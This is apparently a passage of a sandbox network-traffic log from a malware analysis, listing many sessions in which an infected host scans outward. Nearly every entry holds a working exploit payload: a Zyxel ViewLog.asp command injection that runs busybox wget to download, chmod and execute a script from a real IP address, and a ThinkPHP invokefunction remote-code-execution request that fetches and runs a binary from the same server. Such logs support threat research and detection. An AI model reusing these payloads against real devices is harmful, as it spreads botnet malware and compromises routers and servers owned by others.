                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      135192.168.2.155712894.122.211.2528080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:12.501373053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      136192.168.2.155232431.136.86.2138080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:12.703337908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:13.338588953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.586695910 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:17.082483053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:22.202483892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:32.186120033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:52.153501987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.112306118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      137192.168.2.155989694.196.108.2368080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:12.719255924 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:12.959783077 CET83INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      Transfer-Encoding: chunked


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      138192.168.2.154440894.140.80.1678080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:12.732383966 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      139192.168.2.153893094.121.55.908080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:12.749171972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      140192.168.2.155845294.123.103.1258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:12.750796080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      141192.168.2.1555850112.126.91.17780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:13.338241100 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:13.724419117 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:29:13 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      142192.168.2.154395894.230.156.518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:13.504389048 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.650679111 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.886499882 CET339INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 11:24:39 GMT
                                                      Server: Boa/0.94.14rc18
                                                      Accept-Ranges: bytes
                                                      Connection: close
                                                      Content-Type: text/html; charset=ISO-8859-1
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      143192.168.2.155037295.158.186.978080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:13.505382061 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.682605028 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.922130108 CET59INHTTP/1.1 400 Bad Request
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      144192.168.2.153501094.120.165.988080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:13.522249937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      145192.168.2.156044295.43.199.25080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:13.571891069 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      146192.168.2.154373231.136.32.608080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:13.977024078 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.618576050 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:15.866646051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:18.362451077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:23.482391119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:33.466006994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:54.201436043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:35.160224915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      147192.168.2.156066031.136.216.1238080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:13.994944096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.682588100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
